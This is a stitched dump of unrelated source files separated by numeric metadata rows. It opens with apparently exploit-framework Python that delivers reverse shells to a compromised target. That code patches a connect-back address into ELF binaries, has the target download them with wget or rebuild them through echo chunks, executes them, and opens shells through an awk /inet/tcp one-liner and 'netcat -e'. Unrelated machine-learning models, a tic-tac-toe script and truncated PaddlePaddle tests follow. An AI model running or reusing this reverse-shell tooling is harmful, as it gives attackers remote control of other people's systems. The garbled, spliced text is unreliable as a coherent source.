    """Patch the connect-back IP and port into the per-architecture ELF template.

    Stores the finished payload in ``self.revshell`` and a random name for
    the uploaded file in ``self.binary_name``.
    """
    print_status("Generating reverse shell binary")
    self.binary_name = random_text(8)
    ip = self.convert_ip(lhost)
    port = self.convert_port(lport)
    # The hex offsets below index into the raw ELF templates defined as
    # class attributes; they overwrite the placeholder sockaddr fields
    # (IP / port words) baked into each binary. Do not change them without
    # re-deriving the offsets from the template bytes.
    if self.arch == 'arm':
        self.revshell = self.arm[:0x104] + ip + self.arm[0x108:0x10a] + port + self.arm[0x10c:]
    elif self.arch == 'mipsel':
        # The two IP halves are written in swapped order around the port
        # field for this template.
        self.revshell = self.mipsel[:0xe4] + port + self.mipsel[0xe6:0xf0] + ip[2:] + self.mipsel[0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:]
    elif self.arch == 'mips':
        self.revshell = self.mips[:0xea] + port + self.mips[0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[2:] + self.mips[0xf8:]
    else:
        # NOTE(review): self.revshell is left unset on this path - callers
        # that proceed anyway will fail later; confirm intended behaviour.
        print_error("Platform not supported")
def http_server(self, lhost, lport):
    """Serve ``self.revshell`` over HTTP until a request stops the server."""
    print_status("Setting up HTTP server")
    httpd = HttpServer((lhost, int(lport)), HttpRequestHandler)
    httpd.serve_forever(self.revshell)
    httpd.server_close()
def wget(self, binary, location):
    """Deliver the reverse shell by having the target wget it from us.

    Generates the payload, serves it from a local one-shot HTTP server,
    instructs the target to download it with *binary* (a wget path) into
    *location*, executes it, and waits for the connect-back.
    """
    print_status("Using wget method")
    # generate binary
    self.generate_binary(self.lhost, self.lport)
    # run http server (in a thread so we can issue the wget command below)
    thread = threading.Thread(target=self.http_server, args=(self.lhost, self.lport))
    thread.start()
    # wget binary
    print_status("Using wget to download binary")
    cmd = "{} http://{}:{}/{} -O {}/{}".format(binary,
                                               self.lhost,
                                               self.lport,
                                               self.binary_name,
                                               location,
                                               self.binary_name)
    self.exploit.execute(cmd)
    # execute binary
    # NOTE(review): the same lhost:lport pair is used for both the HTTP
    # server above and the connect-back listener here; the HTTP server
    # stops after one GET, but if the download never happens this bind
    # may conflict - confirm.
    sock = self.listen(self.lhost, self.lport)
    self.execute_binary(location, self.binary_name)
    # waiting for shell
    self.shell(sock)
def echo(self, binary, location):
    """Deliver the reverse shell with ``echo -ne`` when no downloader exists.

    The payload is appended to *location*/<random name> on the target in
    30-byte chunks encoded as ``\\xNN`` escapes, then executed; finally we
    wait for the connect-back.
    """
    print_status("Using echo method")
    # generate binary
    self.generate_binary(self.lhost, self.lport)
    path = "{}/{}".format(location, self.binary_name)
    size = len(self.revshell)
    # Bug fix: "/" is float division on Python 3 and range() rejects
    # floats; use integer division as the original Python 2 code intended.
    num_parts = (size // 30) + 1
    # transfer binary through echo command
    print_status("Using echo method to transfer binary")
    for i in range(0, num_parts):
        current = i * 30
        print_status("Transferring {}/{} bytes".format(current, len(self.revshell)))
        chunk = self.revshell[current:current + 30]
        # Bug fix: str.encode('hex') was removed in Python 3; build the
        # doubly-escaped \xNN sequence for each byte directly. An empty
        # final chunk now yields an empty echo instead of a stray "\x".
        block = "".join("\\\\x{:02x}".format(ord(ch)) for ch in chunk)
        cmd = 'echo -ne "{}" >> {}'.format(block, path)
        self.exploit.execute(cmd)
    # execute binary
    sock = self.listen(self.lhost, self.lport)
    self.execute_binary(location, self.binary_name)
    # waiting for shell
    self.shell(sock)
def awk(self, binary):
    """Spawn a reverse shell using awk's /inet/tcp virtual files (no upload needed).

    :param binary: path to the awk interpreter on the target
    """
    print_status("Using awk method")
    # run reverse shell through awk
    sock = self.listen(self.lhost, self.lport)
    # NOTE(review): the |& coprocess operator is a gawk extension - confirm
    # the target's awk is gawk compiled with networking support.
    cmd = binary + " 'BEGIN{s=\"/inet/tcp/0/" + self.lhost + "/" + self.lport + "\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'"
    self.exploit.execute(cmd)
    # waiting for shell
    self.shell(sock)
def netcat(self, binary, shell):
    """Spawn a reverse shell with netcat's ``-e`` option.

    :param binary: path to netcat on the target
    :param shell: shell to attach to the connection (e.g. /bin/sh)
    """
    # Open the connect-back listener first, then trigger netcat.
    listener = self.listen(self.lhost, self.lport)
    command = "{} {} {} -e {}".format(binary, self.lhost, self.lport, shell)
    self.exploit.execute(command)
    # Block until the target connects back.
    self.shell(listener)
def execute_binary(self, location, binary_name):
    """Make the uploaded binary executable, run it, and remove it afterwards."""
    target = "{}/{}".format(location, binary_name)
    command = "chmod 777 {0}; {0}; rm {0}".format(target)
    # Run in a background thread: the binary blocks for as long as the
    # reverse shell stays connected.
    worker = threading.Thread(target=self.exploit.execute, args=(command,))
    worker.start()
def listen(self, lhost, lport):
    """Open a reusable TCP listener for the connect-back and return the socket."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # SO_REUSEADDR lets us rebind quickly after a previous session.
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((lhost, int(lport)))
    server.listen(5)
    return server
def shell(self, sock):
    """Accept one connect-back on *sock* and hand the user an interactive session."""
    print_status("Waiting for reverse shell...")
    client, addr = sock.accept()  # blocks until the target connects
    sock.close()  # single-client: stop listening immediately
    print_status("Connection from {}:{}".format(addr[0], addr[1]))
    print_success("Enjoy your shell")
    # Reuse telnetlib's interact() loop to bridge our stdin/stdout to the
    # connected socket.
    # NOTE(review): telnetlib is deprecated and removed in Python 3.13 -
    # confirm the supported interpreter versions.
    t = telnetlib.Telnet()
    t.sock = client
    t.interact()
| 50.595876
| 152
| 0.573006
| 4,162
| 24,539
| 3.361365
| 0.096588
| 0.468335
| 0.539743
| 0.535239
| 0.648821
| 0.60629
| 0.564689
| 0.530593
| 0.494568
| 0.476912
| 0
| 0.31149
| 0.233221
| 24,539
| 484
| 153
| 50.700413
| 0.432026
| 0.123029
| 0
| 0.229268
| 0
| 0.258537
| 0.568784
| 0.434169
| 0.002439
| 0
| 0.003187
| 0
| 0
| 1
| 0.039024
| false
| 0.002439
| 0.014634
| 0.002439
| 0.095122
| 0.053659
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9655c4750065c8aab745ce56346ad3da6bed2402
| 196
|
py
|
Python
|
paz/optimization/losses/__init__.py
|
niqbal996/paz
|
f27205907367415d5b21f90e1a1d1d1ce598e889
|
[
"MIT"
] | 300
|
2020-10-29T08:02:05.000Z
|
2022-03-30T21:47:32.000Z
|
paz/optimization/losses/__init__.py
|
albertofernandezvillan/paz
|
9fbd50b993f37e1e807297a29c6044c09967c9cc
|
[
"MIT"
] | 30
|
2020-10-29T12:40:32.000Z
|
2022-03-31T14:06:35.000Z
|
paz/optimization/losses/__init__.py
|
albertofernandezvillan/paz
|
9fbd50b993f37e1e807297a29c6044c09967c9cc
|
[
"MIT"
] | 62
|
2020-10-29T12:34:13.000Z
|
2022-03-29T05:21:45.000Z
|
from .multi_box_loss import MultiBoxLoss
from .keypointnet_loss import KeypointNetLoss
from .segmentation import DiceLoss
from .segmentation import FocalLoss
from .segmentation import JaccardLoss
| 32.666667
| 45
| 0.872449
| 23
| 196
| 7.304348
| 0.521739
| 0.285714
| 0.392857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 196
| 5
| 46
| 39.2
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
96664eda008c9845b63827dabf5fba29b985a2b0
| 188
|
py
|
Python
|
models/whitebox/__init__.py
|
yidinghao/whitebox-lstm
|
dcdeaf11c8c374d200801791b59c007094f70baf
|
[
"MIT"
] | 2
|
2020-11-17T21:57:24.000Z
|
2021-01-23T13:16:24.000Z
|
models/whitebox/__init__.py
|
yidinghao/whitebox-lstm
|
dcdeaf11c8c374d200801791b59c007094f70baf
|
[
"MIT"
] | null | null | null |
models/whitebox/__init__.py
|
yidinghao/whitebox-lstm
|
dcdeaf11c8c374d200801791b59c007094f70baf
|
[
"MIT"
] | null | null | null |
from models.whitebox.bracket import BracketRNN
from models.whitebox.counter import CounterRNN
from models.whitebox.sp import SPRNN, FSARNN
from models.whitebox.whitebox import WhiteBoxRNN
| 37.6
| 48
| 0.861702
| 25
| 188
| 6.48
| 0.48
| 0.246914
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090426
| 188
| 4
| 49
| 47
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
96ac18b0d66457623d682bcb15d0e966f46ec30b
| 7,189
|
py
|
Python
|
models/effcientnet.py
|
koukyo1994/kaggle-rfcx
|
c3573d014d99312b58882e7b939de6c1055129b1
|
[
"MIT"
] | 6
|
2021-02-18T05:18:17.000Z
|
2022-02-19T02:49:32.000Z
|
models/effcientnet.py
|
koukyo1994/kaggle-rfcx
|
c3573d014d99312b58882e7b939de6c1055129b1
|
[
"MIT"
] | null | null | null |
models/effcientnet.py
|
koukyo1994/kaggle-rfcx
|
c3573d014d99312b58882e7b939de6c1055129b1
|
[
"MIT"
] | 2
|
2021-02-18T11:31:50.000Z
|
2022-02-19T02:49:07.000Z
|
import timm
import torch
import torch.nn as nn
import torch.nn.functional as F
from efficientnet_pytorch import EfficientNet
from .layers import AttBlockV2
from .utils import init_layer, interpolate, pad_framewise_output
class TimmEfficientNetSED(nn.Module):
    """Sound-event-detection model: timm EfficientNet backbone + attention pooling.

    Produces clipwise and framewise class probabilities/logits via an
    AttBlockV2 attention head over the time axis.
    """

    def __init__(self, base_model_name: str, pretrained=False,
                 num_classes=264):
        super().__init__()
        self.interpolate_ratio = 30  # Downsampled ratio
        # NOTE(review): self.interpolate_ratio appears unused - forward()
        # derives its own ratio from the actual output length; confirm.
        self.base_model = timm.create_model(base_model_name, pretrained=pretrained)
        in_features = self.base_model.classifier.in_features
        # Drop the backbone's final two children (pooling + classifier),
        # keeping only the convolutional feature extractor.
        modules = list(self.base_model.children())
        self.base_model = nn.Sequential(*modules[:-2])
        self.fc1 = nn.Linear(in_features, in_features, bias=True)
        self.att_block = AttBlockV2(in_features, num_classes, activation="sigmoid")
        self.init_weight()

    def init_weight(self):
        # Only fc1 is re-initialized here; the attention block handles its own.
        init_layer(self.fc1)

    def forward(self, input):
        # assumes input is (batch, channels, freq, frames) - TODO confirm
        frames_num = input.size(3)
        # (batch_size, channels, freq, frames)
        x = self.base_model(input)
        # (batch_size, channels, frames) - average over the frequency axis
        x = torch.mean(x, dim=2)
        # channel smoothing: blend max- and average-pooled views over time
        x1 = F.max_pool1d(x, kernel_size=3, stride=1, padding=1)
        x2 = F.avg_pool1d(x, kernel_size=3, stride=1, padding=1)
        x = x1 + x2
        x = F.dropout(x, p=0.5, training=self.training)
        x = x.transpose(1, 2)
        x = F.relu_(self.fc1(x))
        x = x.transpose(1, 2)
        x = F.dropout(x, p=0.5, training=self.training)
        # Attention pooling over time; logit recomputed from raw attention.
        (clipwise_output, norm_att, segmentwise_output) = self.att_block(x)
        logit = torch.sum(norm_att * self.att_block.cla(x), dim=2)
        segmentwise_logit = self.att_block.cla(x).transpose(1, 2)
        segmentwise_output = segmentwise_output.transpose(1, 2)
        # Upsample segment predictions back to the input frame count.
        interpolate_ratio = frames_num // segmentwise_output.size(1)
        # Get framewise output
        framewise_output = interpolate(segmentwise_output,
                                       interpolate_ratio)
        framewise_output = pad_framewise_output(framewise_output, frames_num)
        framewise_logit = interpolate(segmentwise_logit, interpolate_ratio)
        framewise_logit = pad_framewise_output(framewise_logit, frames_num)
        output_dict = {
            "framewise_output": framewise_output,
            "segmentwise_output": segmentwise_output,
            "logit": logit,
            "framewise_logit": framewise_logit,
            "clipwise_output": clipwise_output
        }
        return output_dict
class TimmEfficientNetSEDMax(nn.Module):
    """SED model variant: timm EfficientNet backbone + max pooling over time.

    Unlike the attention variant, the clip-level logit is the temporal max
    of per-segment logits from a plain linear head (fc_audioset).
    """

    def __init__(self, base_model_name: str, pretrained=False,
                 num_classes=264):
        super().__init__()
        self.interpolate_ratio = 30  # Downsampled ratio
        # NOTE(review): self.interpolate_ratio appears unused - forward()
        # derives its own ratio from the actual output length; confirm.
        self.base_model = timm.create_model(base_model_name, pretrained=pretrained)
        in_features = self.base_model.classifier.in_features
        # Drop the backbone's final two children (pooling + classifier).
        modules = list(self.base_model.children())
        self.base_model = nn.Sequential(*modules[:-2])
        self.fc1 = nn.Linear(in_features, in_features, bias=True)
        self.fc_audioset = nn.Linear(in_features, num_classes, bias=True)
        self.init_weight()

    def init_weight(self):
        init_layer(self.fc1)
        init_layer(self.fc_audioset)

    def forward(self, input):
        # assumes input is (batch, channels, freq, frames) - TODO confirm
        frames_num = input.size(3)
        # (batch_size, channels, freq, frames)
        x = self.base_model(input)
        # (batch_size, channels, frames) - average over the frequency axis
        x = torch.mean(x, dim=2)
        # channel smoothing: blend max- and average-pooled views over time
        x1 = F.max_pool1d(x, kernel_size=3, stride=1, padding=1)
        x2 = F.avg_pool1d(x, kernel_size=3, stride=1, padding=1)
        x = x1 + x2
        x = F.dropout(x, p=0.5, training=self.training)
        x = x.transpose(1, 2)
        x = F.relu_(self.fc1(x))
        x = F.dropout(x, p=0.5, training=self.training)
        segmentwise_logit = self.fc_audioset(x)
        # Clip-level logit = max over the time dimension.
        (clipwise_logit, _) = torch.max(segmentwise_logit, dim=1)
        segmentwise_output = torch.sigmoid(segmentwise_logit)
        clipwise_output = torch.sigmoid(clipwise_logit)
        # Upsample segment predictions back to the input frame count.
        interpolate_ratio = frames_num // segmentwise_output.size(1)
        # Get framewise output
        framewise_output = interpolate(segmentwise_output,
                                       interpolate_ratio)
        framewise_output = pad_framewise_output(framewise_output, frames_num)
        framewise_logit = interpolate(segmentwise_logit, interpolate_ratio)
        framewise_logit = pad_framewise_output(framewise_logit, frames_num)
        output_dict = {
            "framewise_output": framewise_output,
            "segmentwise_output": segmentwise_output,
            "logit": clipwise_logit,
            "framewise_logit": framewise_logit,
            "clipwise_output": clipwise_output
        }
        return output_dict
class EfficientNetSED(nn.Module):
    """SED model using the efficientnet_pytorch backbone + attention pooling.

    Same head as TimmEfficientNetSED, but features are taken from
    ``EfficientNet.extract_features`` instead of a truncated timm model.
    """

    def __init__(self, base_model_name: str, pretrained=False,
                 num_classes=264):
        super().__init__()
        self.interpolate_ratio = 30  # Downsampled ratio
        # NOTE(review): self.interpolate_ratio appears unused - forward()
        # derives its own ratio from the actual output length; confirm.
        if pretrained:
            self.base_model = EfficientNet.from_pretrained(base_model_name)
        else:
            self.base_model = EfficientNet.from_name(base_model_name)
        in_features = self.base_model._fc.in_features
        self.fc1 = nn.Linear(in_features, in_features, bias=True)
        self.att_block = AttBlockV2(in_features, num_classes, activation="sigmoid")
        self.init_weight()

    def init_weight(self):
        # Only fc1 is re-initialized here; the attention block handles its own.
        init_layer(self.fc1)

    def forward(self, input):
        # assumes input is (batch, channels, freq, frames) - TODO confirm
        frames_num = input.size(3)
        # (batch_size, channels, freq, frames)
        x = self.base_model.extract_features(input)
        # (batch_size, channels, frames) - average over the frequency axis
        x = torch.mean(x, dim=2)
        # channel smoothing: blend max- and average-pooled views over time
        x1 = F.max_pool1d(x, kernel_size=3, stride=1, padding=1)
        x2 = F.avg_pool1d(x, kernel_size=3, stride=1, padding=1)
        x = x1 + x2
        x = F.dropout(x, p=0.5, training=self.training)
        x = x.transpose(1, 2)
        x = F.relu_(self.fc1(x))
        x = x.transpose(1, 2)
        x = F.dropout(x, p=0.5, training=self.training)
        # Attention pooling over time; logit recomputed from raw attention.
        (clipwise_output, norm_att, segmentwise_output) = self.att_block(x)
        logit = torch.sum(norm_att * self.att_block.cla(x), dim=2)
        segmentwise_logit = self.att_block.cla(x).transpose(1, 2)
        segmentwise_output = segmentwise_output.transpose(1, 2)
        # Upsample segment predictions back to the input frame count.
        interpolate_ratio = frames_num // segmentwise_output.size(1)
        # Get framewise output
        framewise_output = interpolate(segmentwise_output,
                                       interpolate_ratio)
        framewise_output = pad_framewise_output(framewise_output, frames_num)
        framewise_logit = interpolate(segmentwise_logit, interpolate_ratio)
        framewise_logit = pad_framewise_output(framewise_logit, frames_num)
        output_dict = {
            "framewise_output": framewise_output,
            "segmentwise_output": segmentwise_output,
            "logit": logit,
            "framewise_logit": framewise_logit,
            "clipwise_output": clipwise_output
        }
        return output_dict
| 34.898058
| 83
| 0.643483
| 879
| 7,189
| 4.988623
| 0.113766
| 0.085519
| 0.050399
| 0.061574
| 0.872064
| 0.853592
| 0.853592
| 0.853592
| 0.853592
| 0.853592
| 0
| 0.020064
| 0.258172
| 7,189
| 205
| 84
| 35.068293
| 0.802175
| 0.052024
| 0
| 0.814286
| 0
| 0
| 0.032505
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064286
| false
| 0
| 0.05
| 0
| 0.157143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96b78bc8c3c27c4dbe8b3c27b0af4cc2e23fd612
| 2,536
|
py
|
Python
|
tictactoes/tic_tac_toe_1.py
|
SeanRavenhill/Python-Playground
|
bc638be8ec48fa54946395fd93a6944075438fb3
|
[
"MIT"
] | null | null | null |
tictactoes/tic_tac_toe_1.py
|
SeanRavenhill/Python-Playground
|
bc638be8ec48fa54946395fd93a6944075438fb3
|
[
"MIT"
] | null | null | null |
tictactoes/tic_tac_toe_1.py
|
SeanRavenhill/Python-Playground
|
bc638be8ec48fa54946395fd93a6944075438fb3
|
[
"MIT"
] | null | null | null |
# Tic-tac-toe board analyzer.
#
# The board is a 9-character string read row by row:
#   indices 0-2 = top row, 3-5 = middle row, 6-8 = bottom row.
# "_" or " " marks an empty cell.
#
# Fixes over the original version:
# * the "game not finished" check inspected only cells 0-6 (plays[0:7]),
#   missing the last two cells;
# * the bottom-row branch used a bare `if` instead of `elif`, so it could
#   print both "Impossible" and a winner;
# * three equal empty cells counted as a winning line;
# * row checks were mislabeled "Vert" and column checks "Hori".
play = "_OOOO_X_X"


def print_board(cells):
    """Print the 3x3 board in the original ASCII frame format."""
    print("---------")
    for row in range(3):
        print("| " + " ".join(cells[3 * row:3 * row + 3]) + " |")
    print("---------")


def find_winners(cells):
    """Return the set of symbols that own a completed line (row/column/diagonal).

    Empty markers ("_" or " ") never count as a winning line.
    """
    lines = [
        (0, 1, 2), (3, 4, 5), (6, 7, 8),   # rows (horizontal)
        (0, 3, 6), (1, 4, 7), (2, 5, 8),   # columns (vertical)
        (0, 4, 8), (2, 4, 6),              # diagonals
    ]
    winners = set()
    for a, b, c in lines:
        if cells[a] not in "_ " and cells[a] == cells[b] == cells[c]:
            winners.add(cells[a])
    return winners


print_board(play)
plays = [x for x in play]
winners = find_winners(plays)
# A board is impossible if the move counts differ by 2+ or both sides "won".
if abs(plays.count("X") - plays.count("O")) >= 2 or len(winners) > 1:
    print("Impossible")
elif len(winners) == 1:
    print(winners.pop(), "wins")
elif "_" in plays or " " in plays:
    print("Game not finished")
else:
    print("Draw")
| 40.253968
| 77
| 0.539826
| 399
| 2,536
| 3.421053
| 0.105263
| 0.102564
| 0.131868
| 0.21978
| 0.832234
| 0.778755
| 0.737729
| 0.737729
| 0.718681
| 0.718681
| 0
| 0.0536
| 0.249606
| 2,536
| 62
| 78
| 40.903226
| 0.663689
| 0.158517
| 0
| 0.711864
| 0
| 0
| 0.109797
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.474576
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
737653856442575973e895d13957ebdf025eb7f2
| 286
|
py
|
Python
|
cloudsplaining/command/__init__.py
|
roock/cloudsplaining
|
5bda122de41f945e74b977ce109800fd67aa66d4
|
[
"BSD-3-Clause"
] | 3
|
2021-06-08T16:05:09.000Z
|
2021-12-11T19:42:41.000Z
|
cloudsplaining/command/__init__.py
|
roock/cloudsplaining
|
5bda122de41f945e74b977ce109800fd67aa66d4
|
[
"BSD-3-Clause"
] | 5
|
2020-05-06T21:04:25.000Z
|
2021-02-12T01:15:55.000Z
|
cloudsplaining/command/__init__.py
|
roock/cloudsplaining
|
5bda122de41f945e74b977ce109800fd67aa66d4
|
[
"BSD-3-Clause"
] | 3
|
2021-06-17T10:02:10.000Z
|
2022-02-14T22:27:15.000Z
|
# pylint: disable=missing-module-docstring
from cloudsplaining.command import create_exclusions_file
from cloudsplaining.command import expand_policy
from cloudsplaining.command import download
from cloudsplaining.command import scan
from cloudsplaining.command import scan_policy_file
| 40.857143
| 57
| 0.884615
| 35
| 286
| 7.085714
| 0.457143
| 0.362903
| 0.504032
| 0.625
| 0.282258
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08042
| 286
| 6
| 58
| 47.666667
| 0.942966
| 0.13986
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
73c12a772ca191c2d01fad736a723127f9d7c741
| 14,507
|
py
|
Python
|
framework_api/test_static_executor.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 14
|
2020-03-04T07:52:07.000Z
|
2022-02-14T01:39:14.000Z
|
framework_api/test_static_executor.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 19
|
2020-03-04T03:52:10.000Z
|
2021-12-23T07:02:07.000Z
|
framework_api/test_static_executor.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 26
|
2020-03-04T05:39:09.000Z
|
2022-02-14T01:43:28.000Z
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""test static executor."""
import paddle.fluid as fluid
import numpy as np
import tools
import paddle.fluid.compiler as compiler
import os
import time
import platform
def test_global_scope():
    """Write a tensor into the global scope and read it back.

    Sets ``ones((1, 2))`` into variable "data" of the global scope, then
    fetches it again and checks the round-trip value.
    """
    scope = fluid.global_scope()
    tensor = scope.var("data").get_tensor()
    tensor.set(np.ones((1, 2)), fluid.CPUPlace())
    fetched = np.array(scope.find_var("data").get_tensor())
    tools.compare(fetched, [[1, 1]])
def test_scope_guard():
    """Verify that scope_guard redirects global_scope() to a new scope.

    Inside the guard, writes through ``fluid.global_scope()`` must land in
    ``new_scope``; the value is then read back directly from that scope.
    """
    scratch_scope = fluid.Scope()
    with fluid.scope_guard(scratch_scope):
        tensor = fluid.global_scope().var("data").get_tensor()
        tensor.set(np.ones((1, 2)), fluid.CPUPlace())
    fetched = np.array(scratch_scope.find_var("data").get_tensor())
    tools.compare(fetched, [[1, 1]])
def test_Executor():
    """Smoke-test Executor.run on a plain (uncompiled) program.

    Builds a tiny fc+mean network, runs 1000 training steps and fails the
    test if any exception escapes.
    """
    try:
        if fluid.is_compiled_with_cuda():
            place = fluid.CUDAPlace(0)
        else:
            place = fluid.CPUPlace()
        exe = fluid.Executor(place)
        train_program = fluid.Program()
        startup_program = fluid.Program()
        with fluid.unique_name.guard():
            with fluid.program_guard(train_program, startup_program):
                data = fluid.layers.data(name='X', shape=[1], dtype='float32')
                hidden = fluid.layers.fc(input=data, size=10)
                loss = fluid.layers.mean(hidden)
                fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
                startup_program.random_seed = 1
        exe.run(startup_program)
        x = np.random.random(size=(10, 1)).astype('float32')
        for _ in range(1000):
            exe.run(train_program,
                    feed={"X": x},
                    fetch_list=[loss.name])
        assert True
    except Exception:
        assert False
def test_Executor1():
    """Smoke-test Executor.run on a CompiledProgram (data-parallel).

    Same network as test_Executor but executed through
    ``compiler.CompiledProgram(...).with_data_parallel``.
    """
    try:
        if fluid.is_compiled_with_cuda():
            place = fluid.CUDAPlace(0)
        else:
            place = fluid.CPUPlace()
        exe = fluid.Executor(place)
        train_program = fluid.Program()
        startup_program = fluid.Program()
        with fluid.unique_name.guard():
            with fluid.program_guard(train_program, startup_program):
                data = fluid.layers.data(name='X', shape=[1], dtype='float32')
                hidden = fluid.layers.fc(input=data, size=10)
                loss = fluid.layers.mean(hidden)
                fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
                startup_program.random_seed = 1
        exe.run(startup_program)
        x = np.random.random(size=(10, 1)).astype('float32')
        compiled_prog = compiler.CompiledProgram(
            train_program).with_data_parallel(loss_name=loss.name)
        if not fluid.is_compiled_with_cuda():
            os.environ["CPU_NUM"] = "2"
        for _ in range(1000):
            exe.run(compiled_prog,
                    feed={"X": x},
                    fetch_list=[loss.name])
        assert True
    except Exception:
        assert False
def test_Executor2():
    """Running after Executor.close() must raise.

    Closes the executor before the training loop; the test passes only if
    the subsequent ``exe.run`` raises an exception.
    """
    try:
        if fluid.is_compiled_with_cuda():
            place = fluid.CUDAPlace(0)
        else:
            place = fluid.CPUPlace()
        exe = fluid.Executor(place)
        train_program = fluid.Program()
        startup_program = fluid.Program()
        with fluid.unique_name.guard():
            with fluid.program_guard(train_program, startup_program):
                data = fluid.layers.data(name='X', shape=[1], dtype='float32')
                hidden = fluid.layers.fc(input=data, size=10)
                loss = fluid.layers.mean(hidden)
                fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
                startup_program.random_seed = 1
        exe.run(startup_program)
        x = np.random.random(size=(10, 1)).astype('float32')
        compiled_prog = compiler.CompiledProgram(
            train_program).with_data_parallel(loss_name=loss.name)
        if not fluid.is_compiled_with_cuda():
            os.environ["CPU_NUM"] = "2"
        exe.close()  # running after close must fail
        for _ in range(1000):
            exe.run(compiled_prog,
                    feed={"X": x},
                    fetch_list=[loss.name])
        assert False
    except Exception:
        assert True
def test_Executor3():
    """Check the fetched loss value of a seeded data-parallel run.

    Seeds all RNGs so the final loss is deterministic; on Darwin/Linux two
    devices are used, so two (identical) loss values are expected.
    NOTE(review): the reference value -1.9068239 is framework-version
    dependent — confirm against the pinned Paddle release.
    """
    if fluid.is_compiled_with_cuda():
        place = fluid.CUDAPlace(0)
    else:
        place = fluid.CPUPlace()
    exe = fluid.Executor(place)
    train_program = fluid.Program()
    startup_program = fluid.Program()
    startup_program.random_seed = 33
    train_program.random_seed = 33
    np.random.seed(33)
    with fluid.unique_name.guard():
        with fluid.program_guard(train_program, startup_program):
            data = fluid.layers.data(name='X', shape=[1], dtype='float32')
            hidden = fluid.layers.fc(input=data, size=10)
            loss = fluid.layers.mean(hidden)
            fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
            startup_program.random_seed = 1
    exe.run(startup_program)
    x = np.ones(shape=(10, 1)).astype('float32')
    compiled_prog = compiler.CompiledProgram(
        train_program).with_data_parallel(loss_name=loss.name)
    if not fluid.is_compiled_with_cuda():
        os.environ["CPU_NUM"] = "2"
    else:
        os.environ["CUDA_VISIBLE_DEVICES"] = "0, 1"
    for _ in range(1000):
        loss_data = exe.run(compiled_prog,
                            feed={"X": x},
                            fetch_list=[loss.name])[0]
    if platform.system() in ("Darwin", "Linux"):
        tools.compare(loss_data, [-1.9068239, -1.9068239])
    else:
        tools.compare(loss_data, [-1.9068239])
def test_Executor4():
    """Check exe.run with custom feed_var_name / fetch_var_name.

    Identical to test_Executor3 except the feed/fetch variable names are
    overridden; the result must be unaffected.
    """
    if fluid.is_compiled_with_cuda():
        place = fluid.CUDAPlace(0)
    else:
        place = fluid.CPUPlace()
